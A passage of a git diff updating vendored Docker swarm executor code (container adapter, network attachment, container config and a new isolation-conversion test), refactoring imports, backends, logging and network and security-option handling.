+	Create(ctx context.Context, name, driverName string, opts ...volumeopts.CreateOption) (*types.Volume, error)
+}
+
+// ImageBackend is used by an executor to perform image operations
+type ImageBackend interface {
+	PullImage(ctx context.Context, image, tag, platform string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	GetRepository(context.Context, reference.Named, *types.AuthConfig) (distribution.Repository, bool, error)
+	LookupImage(name string) (*types.ImageInspect, error)
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
index f82f8b54d3..fdf1ee2ec7 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
@@ -1,30 +1,35 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
+	"context"
 	"encoding/base64"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"os"
+	"runtime"
 	"strings"
 	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/events"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/daemon"
 	"github.com/docker/docker/daemon/cluster/convert"
 	executorpkg "github.com/docker/docker/daemon/cluster/executor"
-	"github.com/docker/docker/reference"
+	volumeopts "github.com/docker/docker/volume/service/opts"
 	"github.com/docker/libnetwork"
 	"github.com/docker/swarmkit/agent/exec"
 	"github.com/docker/swarmkit/api"
 	"github.com/docker/swarmkit/log"
-	"github.com/docker/swarmkit/protobuf/ptypes"
-	"golang.org/x/net/context"
+	gogotypes "github.com/gogo/protobuf/types"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/time/rate"
 )
 
@@ -32,21 +37,25 @@ import (
 // are mostly naked calls to the client API, seeded with information from
 // containerConfig.
 type containerAdapter struct {
-	backend   executorpkg.Backend
-	container *containerConfig
-	secrets   exec.SecretGetter
+	backend       executorpkg.Backend
+	imageBackend  executorpkg.ImageBackend
+	volumeBackend executorpkg.VolumeBackend
+	container     *containerConfig
+	dependencies  exec.DependencyGetter
 }
 
-func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) {
-	ctnr, err := newContainerConfig(task)
+func newContainerAdapter(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*containerAdapter, error) {
+	ctnr, err := newContainerConfig(task, node)
 	if err != nil {
 		return nil, err
 	}
 
 	return &containerAdapter{
-		container: ctnr,
-		backend:   b,
-		secrets:   secrets,
+		container:     ctnr,
+		backend:       b,
+		imageBackend:  i,
+		volumeBackend: v,
+		dependencies:  dependencies,
 	}, nil
 }
 
@@ -54,16 +63,16 @@ func (c *containerAdapter) pullImage(ctx context.Context) error {
 	spec := c.container.spec()
 
 	// Skip pulling if the image is referenced by image ID.
-	if _, err := digest.ParseDigest(spec.Image); err == nil {
+	if _, err := digest.Parse(spec.Image); err == nil {
 		return nil
 	}
 
 	// Skip pulling if the image is referenced by digest and already
 	// exists locally.
-	named, err := reference.ParseNamed(spec.Image)
+	named, err := reference.ParseNormalizedNamed(spec.Image)
 	if err == nil {
 		if _, ok := named.(reference.Canonical); ok {
-			_, err := c.backend.LookupImage(spec.Image)
+			_, err := c.imageBackend.LookupImage(spec.Image)
 			if err == nil {
 				return nil
 			}
@@ -86,7 +95,10 @@ func (c *containerAdapter) pullImage(ctx context.Context) error {
 	pr, pw := io.Pipe()
 	metaHeaders := map[string][]string{}
 	go func() {
-		err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw)
+		// TODO @jhowardmsft LCOW Support: This will need revisiting as
+		// the stack is built up to include LCOW support for swarm.
+		platform := runtime.GOOS
+		err := c.imageBackend.PullImage(ctx, c.container.image(), "", platform, metaHeaders, authConfig, pw)
 		pw.CloseWithError(err)
 	}()
 
@@ -137,8 +149,8 @@ func (c *containerAdapter) pullImage(ctx context.Context) error {
 }
 
 func (c *containerAdapter) createNetworks(ctx context.Context) error {
-	for _, network := range c.container.networks() {
-		ncr, err := c.container.networkCreateRequest(network)
+	for name := range c.container.networksAttachments {
+		ncr, err := c.container.networkCreateRequest(name)
 		if err != nil {
 			return err
 		}
@@ -147,7 +159,11 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error {
 			if _, ok := err.(libnetwork.NetworkNameError); ok {
 				continue
 			}
-
+			// We will continue if CreateManagedNetwork returns PredefinedNetworkError error.
+			// Other callers still can treat it as Error.
+			if _, ok := err.(daemon.PredefinedNetworkError); ok {
+				continue
+			}
 			return err
 		}
 	}
@@ -156,15 +172,15 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error {
 }
 
 func (c *containerAdapter) removeNetworks(ctx context.Context) error {
-	for _, nid := range c.container.networks() {
-		if err := c.backend.DeleteManagedNetwork(nid); err != nil {
+	for name, v := range c.container.networksAttachments {
+		if err := c.backend.DeleteManagedNetwork(v.Network.ID); err != nil {
 			switch err.(type) {
 			case *libnetwork.ActiveEndpointsError:
 				continue
 			case libnetwork.ErrNoSuchNetwork:
 				continue
 			default:
-				log.G(ctx).Errorf("network %s remove failed: %v", nid, err)
+				log.G(ctx).Errorf("network %s remove failed: %v", name, err)
 				return err
 			}
 		}
@@ -174,7 +190,7 @@ func (c *containerAdapter) removeNetworks(ctx context.Context) error {
 }
 
 func (c *containerAdapter) networkAttach(ctx context.Context) error {
-	config := c.container.createNetworkingConfig()
+	config := c.container.createNetworkingConfig(c.backend)
 
 	var (
 		networkName string
@@ -189,11 +205,11 @@ func (c *containerAdapter) networkAttach(ctx context.Context) error {
 		}
 	}
 
-	return c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config)
+	return c.backend.UpdateAttachment(networkName, networkID, c.container.networkAttachmentContainerID(), config)
 }
 
 func (c *containerAdapter) waitForDetach(ctx context.Context) error {
-	config := c.container.createNetworkingConfig()
+	config := c.container.createNetworkingConfig(c.backend)
 
 	var (
 		networkName string
@@ -208,26 +224,25 @@ func (c *containerAdapter) waitForDetach(ctx context.Context) error {
 		}
 	}
 
-	return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id())
+	return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.networkAttachmentContainerID())
 }
 
 func (c *containerAdapter) create(ctx context.Context) error {
 	var cr containertypes.ContainerCreateCreatedBody
 	var err error
-
 	if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{
 		Name:       c.container.name(),
 		Config:     c.container.config(),
 		HostConfig: c.container.hostConfig(),
 		// Use the first network in container create
-		NetworkingConfig: c.container.createNetworkingConfig(),
+		NetworkingConfig: c.container.createNetworkingConfig(c.backend),
 	}); err != nil {
 		return err
 	}
 
 	// Docker daemon currently doesn't support multiple networks in container create
 	// Connect to all other networks
-	nc := c.container.connectNetworkingConfig()
+	nc := c.container.connectNetworkingConfig(c.backend)
 
 	if nc != nil {
 		for n, ep := range nc.EndpointsConfig {
@@ -239,24 +254,25 @@ func (c *containerAdapter) create(ctx context.Context) error {
 
 	container := c.container.task.Spec.GetContainer()
 	if container == nil {
-		return fmt.Errorf("unable to get container from task spec")
+		return errors.New("unable to get container from task spec")
 	}
 
-	// configure secrets
-	if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil {
+	if err := c.backend.SetContainerDependencyStore(cr.ID, c.dependencies); err != nil {
 		return err
 	}
 
-	refs := convert.SecretReferencesFromGRPC(container.Secrets)
-	if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil {
+	// configure secrets
+	secretRefs := convert.SecretReferencesFromGRPC(container.Secrets)
+	if err := c.backend.SetContainerSecretReferences(cr.ID, secretRefs); err != nil {
 		return err
 	}
 
-	if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil {
+	configRefs := convert.ConfigReferencesFromGRPC(container.Configs)
+	if err := c.backend.SetContainerConfigReferences(cr.ID, configRefs); err != nil {
 		return err
 	}
 
-	return nil
+	return c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig())
 }
 
 // checkMounts ensures that the provided mounts won't have any host-specific
@@ -331,8 +347,8 @@ func (c *containerAdapter) events(ctx context.Context) <-chan events.Message {
 	return eventsq
 }
 
-func (c *containerAdapter) wait(ctx context.Context) error {
-	return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID())
+func (c *containerAdapter) wait(ctx context.Context) (<-chan containerpkg.StateStatus, error) {
+	return c.backend.ContainerWait(ctx, c.container.nameOrID(), containerpkg.WaitConditionNotRunning)
 }
 
 func (c *containerAdapter) shutdown(ctx context.Context) error {
@@ -375,7 +391,10 @@ func (c *containerAdapter) createVolumes(ctx context.Context) error {
 		req := c.container.volumeCreateRequest(&mount)
 
 		// Check if this volume exists on the engine
-		if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil {
+		if _, err := c.volumeBackend.Create(ctx, req.Name, req.Driver,
+			volumeopts.WithCreateOptions(req.DriverOpts),
+			volumeopts.WithCreateLabels(req.Labels),
+		); err != nil {
 			// TODO(amitshukla): Today, volume create through the engine api does not return an error
 			// when the named volume with the same parameters already exists.
 			// It returns an error if the driver name is different - that is a valid error
@@ -395,35 +414,33 @@ func (c *containerAdapter) deactivateServiceBinding() error {
 	return c.backend.DeactivateContainerServiceBinding(c.container.name())
 }
 
-func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) {
-	reader, writer := io.Pipe()
-
-	apiOptions := &backend.ContainerLogsConfig{
-		ContainerLogsOptions: types.ContainerLogsOptions{
-			Follow: options.Follow,
+func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (<-chan *backend.LogMessage, error) {
+	apiOptions := &types.ContainerLogsOptions{
+		Follow: options.Follow,
 
-			// TODO(stevvooe): Parse timestamp out of message. This
-			// absolutely needs to be done before going to production with
-			// this, at it is completely redundant.
-			Timestamps: true,
-			Details:    false, // no clue what to do with this, let's just deprecate it.
-		},
-		OutStream: writer,
+		// Always say yes to Timestamps and Details. we make the decision
+		// of whether to return these to the user or not way higher up the
+		// stack.
+		Timestamps: true,
+		Details:    true,
 	}
 
 	if options.Since != nil {
-		since, err := ptypes.Timestamp(options.Since)
+		since, err := gogotypes.TimestampFromProto(options.Since)
 		if err != nil {
 			return nil, err
 		}
-		apiOptions.Since = since.Format(time.RFC3339Nano)
+		// print since as this formatted string because the docker container
+		// logs interface expects it like this.
+		// see github.com/docker/docker/api/types/time.ParseTimestamps
+		apiOptions.Since = fmt.Sprintf("%d.%09d", since.Unix(), int64(since.Nanosecond()))
 	}
 
 	if options.Tail < 0 {
 		// See protobuf documentation for details of how this works.
 		apiOptions.Tail = fmt.Sprint(-options.Tail - 1)
 	} else if options.Tail > 0 {
-		return nil, fmt.Errorf("tail relative to start of logs not supported via docker API")
+		return nil, errors.New("tail relative to start of logs not supported via docker API")
 	}
 
 	if len(options.Streams) == 0 {
@@ -439,14 +456,11 @@ func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscription
 			}
 		}
 	}
-
-	chStarted := make(chan struct{})
-	go func() {
-		defer writer.Close()
-		c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted)
-	}()
-
-	return reader, nil
+	msgs, _, err := c.backend.ContainerLogs(ctx, c.container.name(), apiOptions)
+	if err != nil {
+		return nil, err
+	}
+	return msgs, nil
 }
 
 // todo: typed/wrapped errors
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
index e0ee81a8b9..f0aa0b9577 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
@@ -1,10 +1,11 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
+	"context"
+
 	executorpkg "github.com/docker/docker/daemon/cluster/executor"
 	"github.com/docker/swarmkit/agent/exec"
 	"github.com/docker/swarmkit/api"
-	"golang.org/x/net/context"
 )
 
 // networkAttacherController implements agent.Controller against docker's API.
@@ -20,8 +21,8 @@ type networkAttacherController struct {
 	closed  chan struct{}
 }
 
-func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) {
-	adapter, err := newContainerAdapter(b, task, secrets)
+func newNetworkAttacherController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*networkAttacherController, error) {
+	adapter, err := newContainerAdapter(b, i, v, task, node, dependencies)
 	if err != nil {
 		return nil, err
 	}
@@ -40,11 +41,7 @@ func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) er
 
 func (nc *networkAttacherController) Prepare(ctx context.Context) error {
 	// Make sure all the networks that the task needs are created.
-	if err := nc.adapter.createNetworks(ctx); err != nil {
-		return err
-	}
-
-	return nil
+	return nc.adapter.createNetworks(ctx)
 }
 
 func (nc *networkAttacherController) Start(ctx context.Context) error {
@@ -69,11 +66,7 @@ func (nc *networkAttacherController) Terminate(ctx context.Context) error {
 func (nc *networkAttacherController) Remove(ctx context.Context) error {
 	// Try removing the network referenced in this task in case this
 	// task is the last one referencing it
-	if err := nc.adapter.removeNetworks(ctx); err != nil {
-		return err
-	}
-
-	return nil
+	return nc.adapter.removeNetworks(ctx)
 }
 
 func (nc *networkAttacherController) Close() error {
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
index f033ad545e..77d21d2c1f 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
 	"errors"
@@ -8,8 +8,9 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	enginecontainer "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/events"
@@ -17,13 +18,16 @@ import (
 	enginemount "github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/api/types/network"
 	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/daemon/cluster/convert"
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
 	clustertypes "github.com/docker/docker/daemon/cluster/provider"
-	"github.com/docker/docker/reference"
 	"github.com/docker/go-connections/nat"
+	netconst "github.com/docker/libnetwork/datastore"
 	"github.com/docker/swarmkit/agent/exec"
 	"github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/docker/swarmkit/api/genericresource"
 	"github.com/docker/swarmkit/template"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
 const (
@@ -44,12 +48,12 @@ type containerConfig struct {
 
 // newContainerConfig returns a validated container config. No methods should
 // return an error if this function returns without error.
-func newContainerConfig(t *api.Task) (*containerConfig, error) {
+func newContainerConfig(t *api.Task, node *api.NodeDescription) (*containerConfig, error) {
 	var c containerConfig
-	return &c, c.setTask(t)
+	return &c, c.setTask(t, node)
 }
 
-func (c *containerConfig) setTask(t *api.Task) error {
+func (c *containerConfig) setTask(t *api.Task, node *api.NodeDescription) error {
 	if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil {
 		return exec.ErrRuntimeUnsupported
 	}
@@ -74,7 +78,7 @@ func (c *containerConfig) setTask(t *api.Task) error {
 	c.task = t
 
 	if t.Spec.GetContainer() != nil {
-		preparedSpec, err := template.ExpandContainerSpec(t)
+		preparedSpec, err := template.ExpandContainerSpec(node, t)
 		if err != nil {
 			return err
 		}
@@ -86,7 +90,7 @@ func (c *containerConfig) setTask(t *api.Task) error {
 	return nil
 }
 
-func (c *containerConfig) id() string {
+func (c *containerConfig) networkAttachmentContainerID() string {
 	attachment := c.task.Spec.GetAttachment()
 	if attachment == nil {
 		return ""
@@ -112,7 +116,7 @@ func (c *containerConfig) nameOrID() string {
 		return c.name()
 	}
 
-	return c.id()
+	return c.networkAttachmentContainerID()
 }
 
 func (c *containerConfig) name() string {
@@ -132,11 +136,11 @@ func (c *containerConfig) name() string {
 
 func (c *containerConfig) image() string {
 	raw := c.spec().Image
-	ref, err := reference.ParseNamed(raw)
+	ref, err := reference.ParseNormalizedNamed(raw)
 	if err != nil {
 		return raw
 	}
-	return reference.WithDefaultTag(ref).String()
+	return reference.FamiliarString(reference.TagNameOnly(ref))
 }
 
 func (c *containerConfig) portBindings() nat.PortMap {
@@ -164,6 +168,18 @@ func (c *containerConfig) portBindings() nat.PortMap {
 	return portBindings
 }
 
+func (c *containerConfig) isolation() enginecontainer.Isolation {
+	return convert.IsolationFromGRPC(c.spec().Isolation)
+}
+
+func (c *containerConfig) init() *bool {
+	if c.spec().Init == nil {
+		return nil
+	}
+	init := c.spec().Init.GetValue()
+	return &init
+}
+
 func (c *containerConfig) exposedPorts() map[nat.Port]struct{} {
 	exposedPorts := make(map[nat.Port]struct{})
 	if c.task.Endpoint == nil {
@@ -183,12 +199,16 @@ func (c *containerConfig) exposedPorts() map[nat.Port]struct{} {
 }
 
 func (c *containerConfig) config() *enginecontainer.Config {
+	genericEnvs := genericresource.EnvFormat(c.task.AssignedGenericResources, "DOCKER_RESOURCE")
+	env := append(c.spec().Env, genericEnvs...)
+
 	config := &enginecontainer.Config{
 		Labels:       c.labels(),
+		StopSignal:   c.spec().StopSignal,
 		Tty:          c.spec().TTY,
 		OpenStdin:    c.spec().OpenStdin,
 		User:         c.spec().User,
-		Env:          c.spec().Env,
+		Env:          env,
 		Hostname:     c.spec().Hostname,
 		WorkingDir:   c.spec().Dir,
 		Image:        c.image(),
@@ -323,22 +343,27 @@ func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig {
 	if hcSpec == nil {
 		return nil
 	}
-	interval, _ := ptypes.Duration(hcSpec.Interval)
-	timeout, _ := ptypes.Duration(hcSpec.Timeout)
+	interval, _ := gogotypes.DurationFromProto(hcSpec.Interval)
+	timeout, _ := gogotypes.DurationFromProto(hcSpec.Timeout)
+	startPeriod, _ := gogotypes.DurationFromProto(hcSpec.StartPeriod)
 	return &enginecontainer.HealthConfig{
-		Test:     hcSpec.Test,
-		Interval: interval,
-		Timeout:  timeout,
-		Retries:  int(hcSpec.Retries),
+		Test:        hcSpec.Test,
+		Interval:    interval,
+		Timeout:     timeout,
+		Retries:     int(hcSpec.Retries),
+		StartPeriod: startPeriod,
 	}
 }
 
 func (c *containerConfig) hostConfig() *enginecontainer.HostConfig {
 	hc := &enginecontainer.HostConfig{
-		Resources:    c.resources(),
-		GroupAdd:     c.spec().Groups,
-		PortBindings: c.portBindings(),
-		Mounts:       c.mounts(),
+		Resources:      c.resources(),
+		GroupAdd:       c.spec().Groups,
+		PortBindings:   c.portBindings(),
+		Mounts:         c.mounts(),
+		ReadonlyRootfs: c.spec().ReadOnly,
+		Isolation:      c.isolation(),
+		Init:           c.init(),
 	}
 
 	if c.spec().DNSConfig != nil {
@@ -347,6 +372,8 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig {
 		hc.DNSOptions = c.spec().DNSConfig.Options
 	}
 
+	c.applyPrivileges(hc)
+
 	// The format of extra hosts on swarmkit is specified in:
 	// http://man7.org/linux/man-pages/man5/hosts.5.html
 	//    IP_address canonical_hostname [aliases...]
@@ -368,11 +395,19 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig {
 		}
 	}
 
+	if len(c.task.Networks) > 0 {
+		labels := c.task.Networks[0].Network.Spec.Annotations.Labels
+		name := c.task.Networks[0].Network.Spec.Annotations.Name
+		if v, ok := labels["com.docker.swarm.predefined"]; ok && v == "true" {
+			hc.NetworkMode = enginecontainer.NetworkMode(name)
+		}
+	}
+
 	return hc
 }
 
 // This handles the case of volumes that are defined inside a service Mount
-func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody {
+func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumeCreateBody {
 	var (
 		driverName string
 		driverOpts map[string]string
@@ -386,7 +421,7 @@ func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.Vol
 	}
 
 	if mount.VolumeOptions != nil {
-		return &volumetypes.VolumesCreateBody{
+		return &volumetypes.VolumeCreateBody{
 			Name:       mount.Source,
 			Driver:     driverName,
 			DriverOpts: driverOpts,
@@ -422,7 +457,7 @@ func (c *containerConfig) resources() enginecontainer.Resources {
 }
 
 // Docker daemon supports just 1 network during container create.
-func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig {
+func (c *containerConfig) createNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig {
 	var networks []*api.NetworkAttachment
 	if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil {
 		networks = c.task.Networks
@@ -430,19 +465,18 @@ func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig {
 
 	epConfig := make(map[string]*network.EndpointSettings)
 	if len(networks) > 0 {
-		epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0])
+		epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0], b)
 	}
 
 	return &network.NetworkingConfig{EndpointsConfig: epConfig}
 }
 
 // TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create
-func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig {
+func (c *containerConfig) connectNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig {
 	var networks []*api.NetworkAttachment
 	if c.task.Spec.GetContainer() != nil {
 		networks = c.task.Networks
 	}
-
 	// First network is used during container create. Other networks are used in "docker network connect"
 	if len(networks) < 2 {
 		return nil
@@ -450,12 +484,12 @@ func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig {
 
 	epConfig := make(map[string]*network.EndpointSettings)
 	for _, na := range networks[1:] {
-		epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na)
+		epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na, b)
 	}
 	return &network.NetworkingConfig{EndpointsConfig: epConfig}
 }
 
-func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings {
+func getEndpointConfig(na *api.NetworkAttachment, b executorpkg.Backend) *network.EndpointSettings {
 	var ipv4, ipv6 string
 	for _, addr := range na.Addresses {
 		ip, _, err := net.ParseCIDR(addr)
@@ -473,13 +507,20 @@ func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings {
 		}
 	}
 
-	return &network.EndpointSettings{
+	n := &network.EndpointSettings{
 		NetworkID: na.Network.ID,
 		IPAMConfig: &network.EndpointIPAMConfig{
 			IPv4Address: ipv4,
 			IPv6Address: ipv6,
 		},
+		DriverOpts: na.DriverAttachmentOpts,
+	}
+	if v, ok := na.Network.Spec.Annotations.Labels["com.docker.swarm.predefined"]; ok && v == "true" {
+		if ln, err := b.FindNetwork(na.Network.Spec.Annotations.Name); err == nil {
+			n.NetworkID = ln.ID()
+		}
 	}
+	return n
 }
 
 func (c *containerConfig) virtualIP(networkID string) string {
@@ -543,19 +584,6 @@ func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig {
 	return svcCfg
 }
 
-// networks returns a list of network names attached to the container. The
-// returned name can be used to lookup the corresponding network create
-// options.
-func (c *containerConfig) networks() []string {
-	var networks []string
-
-	for name := range c.networksAttachments {
-		networks = append(networks, name)
-	}
-
-	return networks
-}
-
 func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) {
 	na, ok := c.networksAttachments[name]
 	if !ok {
@@ -564,29 +592,83 @@ func (c *containerConfig) networkCreateRequest(name string) (clustertypes.Networ
 
 	options := types.NetworkCreate{
 		// ID:     na.Network.ID,
-		Driver: na.Network.DriverState.Name,
-		IPAM: &network.IPAM{
-			Driver:  na.Network.IPAM.Driver.Name,
-			Options: na.Network.IPAM.Driver.Options,
-		},
-		Options:        na.Network.DriverState.Options,
 		Labels:         na.Network.Spec.Annotations.Labels,
 		Internal:       na.Network.Spec.Internal,
 		Attachable:     na.Network.Spec.Attachable,
+		Ingress:        convert.IsIngressNetwork(na.Network),
 		EnableIPv6:     na.Network.Spec.Ipv6Enabled,
 		CheckDuplicate: true,
+		Scope:          netconst.SwarmScope,
 	}
 
-	for _, ic := range na.Network.IPAM.Configs {
-		c := network.IPAMConfig{
-			Subnet:  ic.Subnet,
-			IPRange: ic.Range,
-			Gateway: ic.Gateway,
+	if na.Network.Spec.GetNetwork() != "" {
+		options.ConfigFrom = &network.ConfigReference{
+			Network: na.Network.Spec.GetNetwork(),
 		}
-		options.IPAM.Config = append(options.IPAM.Config, c)
 	}
 
-	return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil
+	if na.Network.DriverState != nil {
+		options.Driver = na.Network.DriverState.Name
+		options.Options = na.Network.DriverState.Options
+	}
+	if na.Network.IPAM != nil {
+		options.IPAM = &network.IPAM{
+			Driver:  na.Network.IPAM.Driver.Name,
+			Options: na.Network.IPAM.Driver.Options,
+		}
+		for _, ic := range na.Network.IPAM.Configs {
+			c := network.IPAMConfig{
+				Subnet:  ic.Subnet,
+				IPRange: ic.Range,
+				Gateway: ic.Gateway,
+			}
+			options.IPAM.Config = append(options.IPAM.Config, c)
+		}
+	}
+
+	return clustertypes.NetworkCreateRequest{
+		ID: na.Network.ID,
+		NetworkCreateRequest: types.NetworkCreateRequest{
+			Name:          name,
+			NetworkCreate: options,
+		},
+	}, nil
+}
+
+func (c *containerConfig) applyPrivileges(hc *enginecontainer.HostConfig) {
+	privileges := c.spec().Privileges
+	if privileges == nil {
+		return
+	}
+
+	credentials := privileges.CredentialSpec
+	if credentials != nil {
+		switch credentials.Source.(type) {
+		case *api.Privileges_CredentialSpec_File:
+			hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=file://"+credentials.GetFile())
+		case *api.Privileges_CredentialSpec_Registry:
+			hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=registry://"+credentials.GetRegistry())
+		}
+	}
+
+	selinux := privileges.SELinuxContext
+	if selinux != nil {
+		if selinux.Disable {
+			hc.SecurityOpt = append(hc.SecurityOpt, "label=disable")
+		}
+		if selinux.User != "" {
+			hc.SecurityOpt = append(hc.SecurityOpt, "label=user:"+selinux.User)
+		}
+		if selinux.Role != "" {
+			hc.SecurityOpt = append(hc.SecurityOpt, "label=role:"+selinux.Role)
+		}
+		if selinux.Level != "" {
+			hc.SecurityOpt = append(hc.SecurityOpt, "label=level:"+selinux.Level)
+		}
+		if selinux.Type != "" {
+			hc.SecurityOpt = append(hc.SecurityOpt, "label=type:"+selinux.Type)
+		}
+	}
 }
 
 func (c containerConfig) eventFilter() filters.Args {
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go
new file mode 100644
index 0000000000..1bf6f6cf02
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go
@@ -0,0 +1,37 @@
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	swarmapi "github.com/docker/swarmkit/api"
+	"gotest.tools/assert"
+)
+
+func TestIsolationConversion(t *testing.T) {
+	cases := []struct {
+		name string
+		from swarmapi.ContainerSpec_Isolation
+		to   container.Isolation
+	}{
+		{name: "default", from: swarmapi.ContainerIsolationDefault, to: container.IsolationDefault},
+		{name: "process", from: swarmapi.ContainerIsolationProcess, to: container.IsolationProcess},
+		{name: "hyperv", from: swarmapi.ContainerIsolationHyperV, to: container.IsolationHyperV},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			task := swarmapi.Task{
+				Spec: swarmapi.TaskSpec{
+					Runtime: &swarmapi.TaskSpec_Container{
+						Container: &swarmapi.ContainerSpec{
+							Image:     "alpine:latest",
+							Isolation: c.from,
+						},
+					},
+				},
+			}
+			config := containerConfig{task: &task}
+			assert.Equal(t, c.to, config.hostConfig().Isolation)
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
index 75f286a217..bcd426e73d 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
@@ -1,11 +1,8 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
-	"bufio"
-	"bytes"
-	"encoding/binary"
+	"context"
 	"fmt"
-	"io"
 	"os"
 	"strconv"
 	"strings"
@@ -19,22 +16,22 @@ import (
 	"github.com/docker/swarmkit/agent/exec"
 	"github.com/docker/swarmkit/api"
 	"github.com/docker/swarmkit/log"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
 	"golang.org/x/time/rate"
 )
 
+const defaultGossipConvergeDelay = 2 * time.Second
+
